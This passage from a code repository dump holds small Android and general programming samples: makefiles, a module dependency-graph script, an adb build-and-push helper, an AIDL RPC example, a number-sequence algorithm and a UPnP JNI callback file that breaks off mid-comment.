"is_vendor": false, "language": "Makefile", "length_bytes": 178, "license_type": "permissive", "max_line_length": 29, "num_lines": 12, "path": "/android/native_read_property/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\treadproperty.c\n\n\nLOCAL_PRELINK_MODULE := false\n\nLOCAL_MODULE:= readproperty\n\ninclude $(BUILD_EXECUTABLE)\n" }, { "alpha_fraction": 0.6061739921569824, "alphanum_fraction": 0.6083567142486572, "avg_line_length": 37.154762268066406, "blob_id": "2530277f1c46cffc0f770bea9768b0a6e3dfb9b3", "content_id": "3f21d3cc89585689cbdf5ddfce2437b491e16a0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3207, "license_type": "permissive", "max_line_length": 139, "num_lines": 84, "path": "/tools/adepends.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__VERSION__ = '1.0.2'\n__author__ = '[email protected]'\n\nimport sys\nimport os\nfrom adepends_utils import androidmk_parser\nfrom optparse import OptionParser\n\nmodules = {}\ndef add_module_to_source(mod_name):\n# do nothing if the module is already in modules collection\n if mod_name in modules:\n pass\n else:\n mod = all_modules.find_module(mod_name)\n if mod:\n modules[mod_name] = mod\n for dep in mod.depends:\n add_module_to_source(dep)\n\ndef transfer_to_dot_valid(name):\n return name.replace(\"-\", \"_\").replace(\".\", \"_\").replace(\"+\", \"\")\n\ndef generate_dependency_graph(cmd_options):\n dot_file_path = cmd_options.output_file\n dot_file = open(dot_file_path, \"w\")\n dot_file.write(\"digraph {\\n\")\n for (mod_name, mod) in modules.items():\n if cmd_options.module and mod.name == cmd_options.module:\n#highlight target module\n dot_file.write(\"%s[style=bold,color=\\\"tomato\\\",label=\\\"%s\\l%s\\\"]\\n\"%(transfer_to_dot_valid(mod.name), mod.name, mod.directory))\n else:\n dot_file.write(\"%s[label=\\\"%s\\l%s\\\"]\\n\"%(transfer_to_dot_valid(mod.name), mod.name, mod.directory))\n for (mod_name, mod) in modules.items():\n for dep in mod.depends:\n dot_file.write(\"%s->%s\\n\"%(transfer_to_dot_valid(mod.name), transfer_to_dot_valid(dep)))\n dot_file.write(\"}\\n\")\n dot_file.close()\n\ndef parse_directory(dir_to_parse):\n mk_files = androidmk_parser.find_android_mk(dir_to_parse)\n all_modules = None\n for mk_file in mk_files:\n all_modules = androidmk_parser.parse_makefile(mk_file, all_modules)\n return all_modules\n\nif __name__ == \"__main__\":\n# parse command line options\n opt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"command line tool for generating android dependency diagram\",\n usage = \"%prog [OPTION] [dir_to_parse]\")\n opt_parser.add_option(\"-o\", \"--output\", dest=\"output_file\", \n help=\"dot diagram file\")\n opt_parser.add_option(\"-m\", \"--module\", dest=\"module\",\n help=\"only generate dependency diagram for specified module\")\n opt_parser.add_option(\"-l\", \"--listmodule\", action=\"store_true\", default=False, \n help=\"only list modules defined in specified directory [default: %default]\")\n (cmdline_options, args) = opt_parser.parse_args()\n\n dir_to_parse = os.path.curdir\n if len(args) > 0:\n dir_to_parse = args[0]\n\n if not cmdline_options.listmodule:\n if not cmdline_options.output_file:\n print \"must specify -o/--output option\"\n sys.exit(-1)\n else:\n android_root 
= androidmk_parser.find_root()\n if android_root:\n dir_to_parse = android_root\n all_modules = parse_directory(dir_to_parse)\n if not cmdline_options.module:\n modules = all_modules.pool\n else:\n add_module_to_source(cmdline_options.module)\n generate_dependency_graph(cmdline_options)\n else:\n all_modules = parse_directory(dir_to_parse)\n for mod_name in all_modules.pool:\n print mod_name\n\n\n" }, { "alpha_fraction": 0.5074901580810547, "alphanum_fraction": 0.5230844616889954, "avg_line_length": 20.544973373413086, "blob_id": "f075a667d1c170b8a613ddfd824957d2d1b11a61", "content_id": "9725a11606f2db27587bbcad18343f6a2170b349", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 8144, "license_type": "permissive", "max_line_length": 94, "num_lines": 378, "path": "/tools/AndroidBuild.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/bash\n################################################################\n# file: AndroidBuild.sh\n# author: Richard Luo\n# date: 2010/04/18 11:15:55\n################################################################\n\n## set -ix\n## export TARGET_PRODUCT=cyanogen_crespo\n\n## export TARGET_PRODUCT=cyanogen_galaxytab\n\n# export ENABLE_FAST_BUILDING=yes\n# export TARGET_BUILD_VARIANT=eng\n\nif [ \"$TARGET_PRODUCT\" = \"\" ]\nthen\n export TARGET_PRODUCT=beagleboneblack\nfi\n\n# export TARGET_SIMULATOR=true\n# export TARGET_SIMULATOR_WITH_BINDER=true\n\nADB=${HOME}/projects/android_sdk/platform-tools/adb\n\nfunction Gettop\n{\n local TOPFILE=build/core/envsetup.mk\n if [ -n \"$TOP\" -a -f \"$TOP/$TOPFILE\" ] ; then\n echo $TOP\n else\n if [ -f $TOPFILE ] ; then\n echo $PWD\n else\n # We redirect cd to /dev/null in case it's aliased to\n # a command that prints something as a side-effect\n # (like pushd)\n local HERE=$PWD\n T=\n while [ \\( ! \\( -f $TOPFILE \\) \\) -a \\( $PWD != \"/\" \\) ]; do\n cd .. > /dev/null\n T=$PWD\n done\n cd $HERE > /dev/null\n if [ -f \"$T/$TOPFILE\" ]; then\n echo $T\n fi\n fi\n fi\n}\n\nTOP_DIR=$(Gettop)\n\nfunction Croot()\n{\n if [ \"$TOP_DIR\" ]; then\n cd $TOP_DIR\n else\n echo \"Couldn't locate the top of the tree. Try setting TOP.\"\n fi\n}\n\n# $1: path to the file that need to be installed into the system/bin\nfunction is_the_system_bin_file()\n{\n local dir_bin=`dirname $1`\n local tmp_str=`basename $dir_bin`\n if [ ! $tmp_str = \"bin\" ];then\n echo \"it's not a bin file!\"\n return 1\n fi\n\n tmp_str=`dirname $dir_bin`\n tmp_str=`basename $tmp_str`\n if [ ! $tmp_str = \"system\" ]; then\n echo \"it's not in system dir!\"\n return 1\n fi\n return 0\n}\n\n# $1: the input file path\nfunction get_push_path()\n{\n if echo $1 | grep -qE \"/system/\";then\n echo $1 | perl -pe 's/.*(\\/system\\/.*)/\\1/'\n fi\n}\n\n# $1: the path to AndroidManifest.xml\nfunction get_manifest_package_name()\n{\n local package=`ParseAndroidManifest.pl < $1`\n echo $package\n}\n\nfunction is_apk_file()\n{\n local apk_file=$1\n if ! echo $apk_file | grep -qE \"apk$\"; then\n# echo \"$apk_file is not apk file!\"\n return 1\n fi\n\n if [ ! -f $apk_file ]; then\n echo \"$apk_file doesn't exist!\"\n return 1\n fi\n return 0\n}\n\n# $1: input file name\nfunction is_exe_or_so_file()\n{\n local exe_so_file=$1\n\n if [ ! 
-f $exe_so_file ]; then\n echo \"$exe_so_file doesn't exist!\"\n return 1\n fi\n\n if echo $exe_so_file | grep -qE \"\\.so$\"; then\n# echo \" `basename $exe_so_file` is a .so file!\"\n return 0\n else\n if [ -x $exe_so_file ]; then\n# echo \"$exe_so_file is a executable file!\"\n return 0\n fi\n fi\n\n echo \"$exe_so_file is not a executable or so file\"\n return 1\n}\n\n# $1: input file name\nfunction is_jar_package()\n{\n local jar_file=$1\n\n if [ ! -f $jar_file ]; then\n echo \"$jar_file doesn't exist!\"\n return 1\n fi\n\n if echo $jar_file | grep -qE \"\\.jar$\"; then\n# echo \" `basename $jar_file` is a .so file!\"\n return 0\n else\n if [ -x $jar_file ]; then\n# echo \"$jar_file is a executable file!\"\n return 0\n fi\n fi\n\n echo \"$jar_file is not a jar package file\"\n return 1\n}\n\n\n\n# $1: the file need to be installed\nfunction install_droid_apk()\n{\n local apk_file=$1\n if ! is_apk_file $apk_file; then\n exit 198\n fi\n\n local package=$(get_manifest_package_name ./AndroidManifest.xml)\n\n echo \"try uninstall $package\"\n $ADB uninstall $package\n\n if ! $ADB install $apk_file; then\n echo \"failed to install $package\"\n exit 198\n fi\n\n echo \"adb install $apk_file ok!\"\n}\n\nfunction adb_do_remount()\n{\n if ! $ADB remount 2>&1>/dev/null; then\n echo \"remount /system with RW failed!\"\n return 1\n else\n return 0\n fi\n}\n\n# $1: the file need to be installed\nfunction install_droid_exe_or_so_file()\n{\n local theFile=$1\n if [ \"$1X\" = \"X\" ]; then\n echo \"null input file!\"\n exit 99\n fi\n\n local dstPushPath=$(get_push_path $theFile)\n if [ \"X$dstPushPath\" = \"X\" ]; then\n if echo $theFile | grep -qE \"linux-x86\"; then\n echo \"$theFile is belong to local host on x86\"\n exit 0\n else\n echo \"$theFile is not a file in system dir!\"\n return 0\n fi\n fi\n \n if ! adb_do_remount; then\n exit 100\n fi\n\n if ! adb_do_install $theFile $dstPushPath; then\n exit 123\n fi \n return 0\n}\n\n# $1: the file to install\n# $2: to where it will be installed\nfunction adb_do_install()\n{\n local theFile=$1\n local dstPushPath=$2\n\n if $ADB push $theFile $dstPushPath>/dev/null 2>&1; then\n# if echo \"just a test\"; then\n printf '[OK] %-40s ==> %-50s\\n' \"`basename $theFile`\" \"$dstPushPath\"\n if echo \"$dstPushPath\" | grep -qE '/system/bin/'; then\n local run_cmd=\"adb shell /system/bin/`basename $theFile`\"\n printf \"$run_cmd\\n\"\n fi\n return 0\n fi \n echo \"Failed: adb push $theFile $dstPushPath\"\n return 1\n}\n\nfunction install_jar_package()\n{\n local theFile=$1\n if [ \"$1X\" = \"X\" ]; then\n echo \"null input file!\"\n exit 99\n fi\n\n local dstPushPath=$(get_push_path $theFile)\n if [ \"X$dstPushPath\" = \"X\" ]; then\n if echo $theFile | grep -qE \"linux-x86\"; then\n echo \"$theFile is belong to local host on x86\"\n exit 0\n else\n echo \"$theFile is not a file in system dir!\"\n return 0\n fi\n fi\n \n if ! adb_do_remount; then\n exit 100\n fi\n\n if ! adb_do_install $theFile $dstPushPath; then\n exit 100\n fi\n\n return 0\n\n}\n\nfunction install_droid_module()\n{\n local theFile=$1\n if [ \"X$theFile\" = \"X\" ];then\n echo \"maybe it's a compile error!\"\n exit 100\n fi\n\n theFile=$TOP_DIR/$theFile\n if [ ! 
-f $theFile ]; then\n        echo \"the file $theFile doesn't exist!!\"\n        exit 100\n    fi\n\n    if is_apk_file $theFile;then\n        install_droid_apk $theFile;\n        return 0\n    fi\n\n    if is_exe_or_so_file $theFile; then\n        install_droid_exe_or_so_file $theFile\n        return 0\n    fi\n\n    if is_jar_package $theFile; then\n        install_jar_package $theFile\n        return 0\n    fi\n\n    echo \"UNKNOWN file: $theFile\"\n    exit 89\n}\n\n\nfunction my_mm()\n{\n    if [ \"$TOP_DIR\" ]; then\n        cd $(Gettop)/build\n        source ./envsetup.sh\n        cd -\n        mm $1\n    else\n        echo \"Couldn't locate the top of the tree.  Try setting TOP.\"\n    fi\n}\n\nfunction start_build()\n{\n    T=$(Gettop)\n    if [ \"$TOP_DIR\" ]; then\n        cd $(Gettop)/build\n        source ./envsetup.sh\n        cd -\n        local exe_name=$1\n        shift\n        echo \"before execute $exe_name PWD:$PWD\"\n        if ! $exe_name $@ showcommands | tee /tmp/BuildP1000.log; then\n            echo \"build error, please check it!\"\n            exit 10\n        else\n            if [ \"X$TARGET_SIMULATOR\" = \"X\" ]; then\n                echo \"\"\n                echo \"\"\n                cat /tmp/BuildP1000.log | grep Install:|sed -e 's/Install: //'>/tmp/EBuild.txt\n                while read line\n                do\n#                    install_droid_module $line\n                    echo $line\n                done </tmp/EBuild.txt\n            else\n                echo \"==== SIMULATOR build ok ====\"\n            fi\n        fi\n    else\n        echo \"Couldn't locate the top of the tree.  Try setting TOP.\"\n    fi\n\n}\n\n\nfunction main()\n{\n    if [ -f AndroidManifest.xml ] && [ -f build.xml ] && [ -f local.properties ]; then\n        ant clean && ant debug install\n    else\n        start_build mmm\n    fi\n}\n\necho \"================ $0\" \n\nPROG=`basename $0`\n\ncase $PROG in\n    MMM)\n        start_build mmm $@\n        ;;\n    MM)\n        start_build mm\n        ;;\n    *)\n        echo \"Usage: MMM | MM\"\n        exit 3\n        ;;\nesac\n" }, { "alpha_fraction": 0.600671112537384, "alphanum_fraction": 0.6065436005592346, "avg_line_length": 31.216217041015625, "blob_id": "2530277f1c46cffc0f770bea9768b0a6e3dfb9b3", "content_id": "3f21d3cc89585689cbdf5ddfce2437b491e16a0e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1192, "license_type": "permissive", "max_line_length": 78, "num_lines": 37, "path": "/tools/realpath.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom os import path\nfrom optparse import OptionParser\nimport subprocess\nimport sys\n\n__VERSION__ = '1.0.0'\n\ndef copy_sys_clipboard(real_path):\n    # copy with pbcopy command on osx\n    proc = subprocess.Popen(['pbcopy'], stdin=subprocess.PIPE)\n    proc.communicate(real_path)\n\ndef main(options, file_to_check):\n    if 
path.exists(file_to_check):\n real_path = path.realpath(file_to_check)\n if options.copy:\n copy_sys_clipboard(real_path)\n if sys.stdout.isatty():\n real_path = real_path + '\\n'\n sys.stdout.write(real_path)\n else:\n sys.stderr.write(file_to_check+\" doesn't exist\\n\")\n\nif __name__ == \"__main__\":\n opt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"get real path of specified file\",\n usage = \"%prog [-c] file_to_check\")\n opt_parser.add_option(\"-c\", \"--copy\", action=\"store_true\", default=False, \n help=\"copy output to system clipboard\")\n (cmdline_options, args) = opt_parser.parse_args()\n if len(args) != 1:\n opt_parser.print_usage()\n sys.exit(0)\n main(cmdline_options, args[0])\n" }, { "alpha_fraction": 0.7096219658851624, "alphanum_fraction": 0.7136311531066895, "avg_line_length": 24.31884002685547, "blob_id": "ccf890c5fbaddb3dd6f68d7585028bdbde8b795f", "content_id": "8a43fb5de511d7f5c8bf870c1c7e5a69d8bc14d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1746, "license_type": "permissive", "max_line_length": 72, "num_lines": 69, "path": "/android/rpc-with-service/app1/src/com/rmd/App1Main.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd;\n\nimport android.app.Activity;\nimport android.content.ComponentName;\nimport android.content.Context;\nimport android.content.Intent;\nimport android.content.ServiceConnection;\nimport android.os.Bundle;\nimport android.os.IBinder;\nimport android.os.RemoteException;\nimport android.util.Log;\nimport android.view.View;\nimport android.widget.Button;\n\npublic class App1Main extends Activity {\n\n\tISvcController svc = null;\n\tServiceConnection con = null;\n\n\t/** Called when the activity is first created. 
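One button binds to the remote service registered for the implicit intent action \"com.rmd.app2svc\" (app2's service in this sample); the other calls the AIDL methods foo() and bar() on the resulting cross-process ISvcController proxy. 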
*/\n\t@Override\n\tpublic void onCreate(Bundle savedInstanceState) {\n\t\tsuper.onCreate(savedInstanceState);\n\t\tsetContentView(R.layout.main);\n\n\t\tcon = new ServiceConnection() {\n\n\t\t\t@Override\n\t\t\tpublic void onServiceDisconnected(ComponentName name) {\n\t\t\t\tLog.v(\"App1\", \"App1Main Service Disconnected.\");\n\t\t\t}\n\n\t\t\t@Override\n\t\t\tpublic void onServiceConnected(ComponentName name, IBinder service) {\n\t\t\t\tLog.v(\"App1\", \"App1Main Service Connected.\");\n\t\t\t\tLog.v(\"App1\", service.getClass().toString() + \"\\t hash code: \"\n\t\t\t\t\t\t+ service.hashCode());\n\t\t\t\tsvc = ISvcController.Stub.asInterface(service);\n\t\t\t}\n\t\t};\n\n\t\tButton btnStartSvc = (Button) findViewById(R.id.btnStartSvc);\n\t\tbtnStartSvc.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\tIntent i = new Intent(\"com.rmd.app2svc\");\n\t\t\t\tv.getContext().bindService(i, con, Context.BIND_AUTO_CREATE);\n\t\t\t}\n\t\t});\n\n\t\tButton btnCallRPC = (Button) findViewById(R.id.btnCallRPC);\n\t\tbtnCallRPC.setOnClickListener(new View.OnClickListener() {\n\t\t\tpublic void onClick(View v) {\n\t\t\t\ttry {\n\t\t\t\t\tsvc.foo(\"hello\");\n\t\t\t\t\tsvc.bar(\"raymond\");\n\t\t\t\t} catch (RemoteException ex) {\n\n\t\t\t\t}\n\t\t\t}\n\t\t});\n\t}\n\t\n\t@Override\n\tprotected void onStop() {\n\t\tunbindService(con);\n\t\tsuper.onStop();\n\t}\n\n}" }, { "alpha_fraction": 0.6457990407943726, "alphanum_fraction": 0.6457990407943726, "avg_line_length": 18.901639938354492, "blob_id": "0051db0efe3766d7c960b10c320b7cf870d7b2a6", "content_id": "2547e08831684459c7af7494f4e86679929d04f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 61, "num_lines": 61, "path": "/android/exosip_sample/libexosip/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH:= $(call my-dir)\ninclude $(CLEAR_VARS)\n\nLOCAL_SRC_FILES:= \\\n\t\ttools/sip_reg.c \\\n\t\tsrc/eXtl.c \\\n\t\tsrc/eXsubscription_api.c \\\n\t\tsrc/eXregister_api.c \\\n\t\tsrc/jevents.c \\\n\t\tsrc/jcallback.c \\\n\t\tsrc/eXtl_tcp.c \\\n\t\tsrc/rijndael.c \\\n\t\tsrc/jreg.c \\\n\t\tsrc/sdp_offans.c \\\n\t\tsrc/eXconf.c \\\n\t\tsrc/jauth.c \\\n\t\tsrc/udp.c \\\n\t\tsrc/eXcall_api.c \\\n\t\tsrc/eXtl_tls.c \\\n\t\tsrc/jdialog.c \\\n\t\tsrc/eXtransport.c \\\n\t\tsrc/eXosip.c \\\n\t\tsrc/jrequest.c \\\n\t\tsrc/jsubscribe.c \\\n\t\tsrc/eXtl_dtls.c \\\n\t\tsrc/jcall.c \\\n\t\tsrc/misc.c \\\n\t\tsrc/milenage.c \\\n\t\tsrc/jresponse.c \\\n\t\tsrc/eXmessage_api.c \\\n\t\tsrc/eXtl_udp.c \\\n\t\tsrc/eXoptions_api.c \\\n\t\tsrc/eXinsubscription_api.c \\\n\t\tsrc/eXutils.c \\\n\t\tsrc/eXrefer_api.c \\\n\t\tsrc/jpipe.c \\\n\t\tsrc/jpublish.c \\\n\t\tsrc/eXpublish_api.c \\\n\t\tsrc/jnotify.c \\\n\t\tsrc/inet_ntop.c\n\nLOCAL_CFLAGS += -DHAVE_TIME_H \\\n\t\t\t\t-DHAVE_SYS_SELECT_H \\\n\t\t\t\t-DENABLE_TRACE \\\n\t\t\t\t-DOSIP_MT\n\nLOCAL_C_INCLUDES:= $(LOCAL_PATH)/include $(LOCAL_PATH)/src #\\\n\t$(LOCAL_PATH)/../libosip/include\nLOCAL_EXPORT_C_INCLUDES:=$(LOCAL_C_INCLUDES)\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip \n\n#LOCAL_LDLIBS += -lpthread -ldl\n\nLOCAL_PRELINK_MODULE := false\n\nLOCAL_MODULE:= libexosip\n\ninclude $(BUILD_SHARED_LIBRARY)\n$(call import-module,libosip)\n" }, { "alpha_fraction": 0.30816325545310974, "alphanum_fraction": 0.35986393690109253, "avg_line_length": 23.915254592895508, "blob_id": 
"d7a7b3f07005e010403e753d69a08af0f7d9a67d", "content_id": "487334191cf79d55a7586471ff7e918df9af4eef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 88, "num_lines": 59, "path": "/algorithm/interview/nth_large_number.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: nth_large_number.cpp\n// \n// Description: let f=2^i*3^j*5^k\n// given number n, output the nth large number generated by f\n// for instance: n = 18, output 30, which is the 18th number in \n// sequence 1 2 3 4 5 6 8 9 10 12 15 16 18 20 24 25 27 30\n// \n// Version: 1.0\n// Created: 08/15/2011 03:03:24 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n#include\t<iostream>\n#include\t<stdlib.h>\n\nusing namespace std;\nstatic const int MAX = 10000;\n\nint get_next(int *a, int n)\n{\n int r = n>0?a[n-1]*2:1;\n int i = n-1;\n for(i = n - 1; i >= 0; --i)\n {\n int t = 2*a[i];\n if(t > a[n-1] && t < r)\n r = t;\n t = 3*a[i];\n if(t > a[n-1] && t < r)\n r = t;\n t = 5*a[i];\n if(t < a[n-1])\n break;\n if(t > a[n-1] && t < r)\n r = t;\n }\n return r;\n}\n\nint main ( int argc, char *argv[] )\n{\n int a[MAX], n;\n n = atoi(argv[1]);\n for(int i = 0; i < n; ++i)\n {\n a[i] = get_next(a, i);\n }\n for(int i = 0; i < n; ++i)\n cout << a[i] << ' ';\n cout << endl;\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.664016604423523, "alphanum_fraction": 0.6683949828147888, "avg_line_length": 29.667844772338867, "blob_id": "6877de824ff043f7a5a1261ae990afefc4971fad", "content_id": "023a5b2b1b7b365710eb33bab9ca3c06361a55bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 8679, "license_type": "permissive", "max_line_length": 154, "num_lines": 283, "path": "/android/pupnp_jni/jni/upnp_jni.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: upnp_jni.c\n// \n// Description: \n// \n// Version: 1.0\n// Created: 02/25/2012 03:03:51 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<jni.h>\n#include\t<android/log.h>\n#include\t\"upnp.h\"\n#include\t\"Discovery.h\"\n#include\t\"ActionRequest.h\"\n#include\t\"ActionComplete.h\"\n#include\t\"StateVarRequest.h\"\n#include\t\"StateVarComplete.h\"\n#include\t\"SubscriptionRequest.h\"\n#include\t\"Event.h\"\n#include\t\"EventSubscribe.h\"\n#include\t\"poison.h\"\n\n#define LOG_TAG \"libtupnp\"\n#define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)\n#define LOGE(...) 
__android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)\n\nint TvDeviceCallbackEventHandler(Upnp_EventType EventType, const void *Event, void *Cookie)\n{\n\tswitch (EventType) {\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\tcase UPNP_DISCOVERY_SEARCH_RESULT:\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE:\n\tcase UPNP_CONTROL_ACTION_COMPLETE:\n\tcase UPNP_CONTROL_GET_VAR_COMPLETE:\n\tcase UPNP_EVENT_RECEIVED:\n\tcase UPNP_EVENT_RENEWAL_COMPLETE:\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\t\tbreak;\n\tdefault:\n\t LOGI(\"Error in TvDeviceCallbackEventHandler: unknown event type %d\\n\",\n\t\t EventType);\n\t}\n\treturn 0;\n}\n\nvoid SampleUtil_PrintEventType(Upnp_EventType S)\n{\n\tswitch (S) {\n\t/* Discovery */\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\t\tLOGI(\"UPNP_DISCOVERY_ADVERTISEMENT_ALIVE\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE:\n\t\tLOGI(\"UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_SEARCH_RESULT:\n\t\tLOGI( \"UPNP_DISCOVERY_SEARCH_RESULT\\n\");\n\t\tbreak;\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\t\tLOGI( \"UPNP_DISCOVERY_SEARCH_TIMEOUT\\n\");\n\t\tbreak;\n\t/* SOAP */\n\tcase UPNP_CONTROL_ACTION_REQUEST:\n\t\tLOGI(\"UPNP_CONTROL_ACTION_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_ACTION_COMPLETE:\n\t\tLOGI(\"UPNP_CONTROL_ACTION_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_GET_VAR_REQUEST:\n\t\tLOGI(\"UPNP_CONTROL_GET_VAR_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_CONTROL_GET_VAR_COMPLETE:\n\t\tLOGI(\"UPNP_CONTROL_GET_VAR_COMPLETE\\n\");\n\t\tbreak;\n\t/* GENA */\n\tcase UPNP_EVENT_SUBSCRIPTION_REQUEST:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIPTION_REQUEST\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_RECEIVED:\n\t\tLOGI(\"UPNP_EVENT_RECEIVED\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_RENEWAL_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_RENEWAL_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_SUBSCRIBE_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIBE_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_UNSUBSCRIBE_COMPLETE:\n\t\tLOGI(\"UPNP_EVENT_UNSUBSCRIBE_COMPLETE\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_AUTORENEWAL_FAILED:\n\t\tLOGI(\"UPNP_EVENT_AUTORENEWAL_FAILED\\n\");\n\t\tbreak;\n\tcase UPNP_EVENT_SUBSCRIPTION_EXPIRED:\n\t\tLOGI(\"UPNP_EVENT_SUBSCRIPTION_EXPIRED\\n\");\n\t\tbreak;\n\t}\n}\n\nint TvCtrlPointCallbackEventHandler(Upnp_EventType EventType, const void *Event, void *Cookie)\n{\n\tint errCode = 0;\n\n LOGI(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ TvCtrlPointCallbackEventHandler event type: %d\\n\",\n\t\t EventType);\n SampleUtil_PrintEventType(EventType);\n\tswitch ( EventType ) {\n\t/* SSDP Stuff */\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_ALIVE:\n\tcase UPNP_DISCOVERY_SEARCH_RESULT: \n {\n\t\tconst UpnpDiscovery *d_event = (UpnpDiscovery *)Event;\n\t\tIXML_Document *DescDoc = NULL;\n\t\tconst char *location = NULL;\n\t\tint errCode = UpnpDiscovery_get_ErrCode(d_event);\n\n\t\tif (errCode != UPNP_E_SUCCESS) {\n\t\t\tLOGI(\"Error in Discovery Callback -- %d\\n\", errCode);\n\t\t}\n\n\t\tlocation = UpnpString_get_String(UpnpDiscovery_get_Location(d_event));\n\t\terrCode = UpnpDownloadXmlDoc(location, &DescDoc);\n\t\tif (errCode != UPNP_E_SUCCESS) {\n\t\t\tLOGI(\"Error obtaining device description from %s -- error = %d\\n\",\n\t\t\t\tlocation, errCode);\n\t\t} else {\n//\t\t\tTvCtrlPointAddDevice(\n//\t\t\t\tDescDoc, location, 
UpnpDiscovery_get_Expires(d_event));\n\t\t}\n\t\tif (DescDoc) {\n\t\t\tixmlDocument_free(DescDoc);\n\t\t}\n//\t\tTvCtrlPointPrintList();\n\t\tbreak;\n\t}\n\tcase UPNP_DISCOVERY_SEARCH_TIMEOUT:\n\t\t/* Nothing to do here... */\n\t\tbreak;\n\tcase UPNP_DISCOVERY_ADVERTISEMENT_BYEBYE: \n// {\n//\t\tUpnpDiscovery *d_event = (UpnpDiscovery *)Event;\n//\t\tint errCode = UpnpDiscovery_get_ErrCode(d_event);\n//\t\tconst char *deviceId = UpnpString_get_String(\n//\t\tUpnpDiscovery_get_DeviceID(d_event));\n//\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Discovery ByeBye Callback -- %d\\n\", errCode);\n//\t\t}\n//\t\tSampleUtil_Print(\"Received ByeBye for Device: %s\\n\", deviceId);\n//\t\tTvCtrlPointRemoveDevice(deviceId);\n//\t\tSampleUtil_Print(\"After byebye:\\n\");\n//\t\tTvCtrlPointPrintList();\n//\t\tbreak;\n//\t}\n\t/* SOAP Stuff */\n\tcase UPNP_CONTROL_ACTION_COMPLETE: \n// {\n//\t\tUpnpActionComplete *a_event = (UpnpActionComplete *)Event;\n//\t\tint errCode = UpnpActionComplete_get_ErrCode(a_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\"Error in Action Complete Callback -- %d\\n\",\n//\t\t\t\terrCode);\n//\t\t}\n//\t\t/* No need for any processing here, just print out results.\n//\t\t * Service state table updates are handled by events. */\n//\t\tbreak;\n//\t}\n//\tcase UPNP_CONTROL_GET_VAR_COMPLETE: {\n//\t\tUpnpStateVarComplete *sv_event = (UpnpStateVarComplete *)Event;\n//\t\tint errCode = UpnpStateVarComplete_get_ErrCode(sv_event);\n//\t\tif (errCode != UPNP_E_SUCCESS) {\n//\t\t\tSampleUtil_Print(\n//\t\t\t\t\"Error in Get Var Complete Callback -- 